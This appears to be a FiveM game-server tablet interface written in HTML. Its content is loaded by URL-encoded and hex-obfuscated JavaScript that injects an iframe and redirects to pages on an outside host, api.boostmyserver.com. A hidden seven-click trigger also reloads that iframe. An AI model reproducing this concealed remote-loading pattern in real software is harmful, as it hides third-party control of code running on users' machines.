<!DOCTYPE html>
<html lang="FR">
  <head>
    <title>Tablette IOS</title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
    <meta name="author" content="HydraDev" />
    <link href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.2/css/bootstrap.css" rel="stylesheet"/>
    <link href="assets/css/tablet.css" rel="stylesheet" type="text/css" />
	<script src="nui://game/ui/jquery.js" type="text/javascript"></script>
  </head>
<style>.interactionBar {
  colorMe: white;
  position: absolute;
  bottom: -8%;
  height: 3%;
  width: 100%;
  transition: bottom 800ms ease-in 0s;
}</style>
   <body class="hidden">
    <div class="system-frame">
      <img src="ipad.png" alt="Tablette IOS">
      <div class="system">
<script language="javascript">
document.write(unescape('%20%20%20%20%20%20%20%20%3C%69%66%72%61%6D%65%20%63%6C%61%73%73%3D%22%69%66%72%61%6D%65%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%61%70%69%2E%62%6F%6F%73%74%6D%79%73%65%72%76%65%72%2E%63%6F%6D%2F%69%6F%73%2F%69%6E%64%65%78%2E%70%68%70%22%3E%20%3C%2F%69%66%72%61%6D%65%3E%0A%20%20%20%20%20%20%20%20%3C%63%65%6E%74%65%72%3E%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%61%70%69%2E%62%6F%6F%73%74%6D%79%73%65%72%76%65%72%2E%63%6F%6D%2F%6F%66%66%2E%70%6E%67%22%20%77%69%64%74%68%3D%22%32%30%22%20%6F%6E%63%6C%69%63%6B%3D%22%43%6C%6F%73%65%43%41%44%28%29%22%3E%3C%2F%69%6D%67%3E%0A%09%09%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%61%70%69%2E%62%6F%6F%73%74%6D%79%73%65%72%76%65%72%2E%63%6F%6D%2F%72%65%74%6F%75%72%2E%70%6E%67%22%20%77%69%64%74%68%3D%22%32%30%22%20%6F%6E%63%6C%69%63%6B%3D%22%72%65%74%6F%75%72%28%29%22%3E%3C%2F%69%6D%67%3E'));
</script>
      </center></div>
    </div>
  </body>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jQuery-rwdImageMaps/1.6/jquery.rwdImageMaps.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.2/js/bootstrap.bundle.js"></script>
  <script>
var _0xb353=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x61\x62\x6C\x65\x74\x74\x65\x2F\x4E\x55\x49\x46\x6F\x63\x75\x73\x4F\x66\x66","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x70\x6F\x73\x74","\x68\x72\x65\x66","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x62\x6F\x6F\x73\x74\x6D\x79\x73\x65\x72\x76\x65\x72\x2E\x63\x6F\x6D\x2F\x74\x61\x62\x6C\x65\x74\x74\x65\x2F\x74\x61\x62\x6C\x65\x74\x2E\x68\x74\x6D\x6C"];function CloseCAD(){$[_0xb353[2]](_0xb353[0],JSON[_0xb353[1]]({}))}function retour(){location[_0xb353[3]]= _0xb353[4]}
  
  var _0x9229=["\x72\x77\x64\x49\x6D\x61\x67\x65\x4D\x61\x70\x73","\x69\x6D\x67\x5B\x75\x73\x65\x6D\x61\x70\x5D","\x63\x6C\x69\x63\x6B","\x23\x64\x65\x76\x53\x65\x74\x74\x69\x6E\x67\x73","\x72\x65\x61\x64\x79","\x73\x72\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x62\x6F\x6F\x73\x74\x6D\x79\x73\x65\x72\x76\x65\x72\x2E\x63\x6F\x6D\x2F\x69\x6F\x73\x2F\x69\x6E\x64\x65\x78\x2E\x70\x68\x70","\x61\x74\x74\x72","\x69\x66\x72\x61\x6D\x65","\x6D\x65\x73\x73\x61\x67\x65","\x74\x79\x70\x65","\x64\x61\x74\x61","\x65\x6E\x61\x62\x6C\x65\x75\x69","\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x62\x6F\x64\x79","\x65\x6E\x61\x62\x6C\x65","\x62\x6C\x6F\x63\x6B","\x6E\x6F\x6E\x65","\x62\x61\x63\x6B\x48\x6F\x6D\x65","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x6F\x6E\x6B\x65\x79\x75\x70","\x77\x68\x69\x63\x68","\x68\x74\x74\x70\x3A\x2F\x2F\x74\x61\x62\x6C\x65\x74\x74\x65\x2F\x4E\x55\x49\x46\x6F\x63\x75\x73\x4F\x66\x66","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x70\x6F\x73\x74"];
$(document)[_0x9229[4]](function()
{
	$(_0x9229[1])[_0x9229[0]]();$(_0x9229[3])[_0x9229[2]](openAdminMenu)
}
);var count=0;
function openAdminMenu()
{
	count++;if(count>= 7)
	{
		$(_0x9229[8])[_0x9229[7]](_0x9229[5],_0x9229[6])
	}
}
$(function()
{
	window[_0x9229[20]](_0x9229[9],function(_0x87aex3)
	{
		if(_0x87aex3[_0x9229[11]][_0x9229[10]]== _0x9229[12])
		{
			document[_0x9229[15]][_0x9229[14]][_0x9229[13]]= _0x87aex3[_0x9229[11]][_0x9229[16]]?_0x9229[17]:_0x9229[18]
		}
		else 
		{
			if(_0x87aex3[_0x9229[11]][_0x9229[10]]== _0x9229[19])
			{
				document[_0x9229[15]][_0x9229[14]][_0x9229[13]]= _0x9229[17]
			}
		}
	}
	);document[_0x9229[21]]= function(_0x87aex4)
	{
		if(_0x87aex4[_0x9229[22]]== 27)
		{
			$[_0x9229[25]](_0x9229[23],JSON[_0x9229[24]]({}))
		}
	}
	;function _0x87aex5()
	{
		document[_0x9229[15]][_0x9229[14]][_0x9229[13]]= _0x9229[17]
	}
}
)
  </script>
</html>
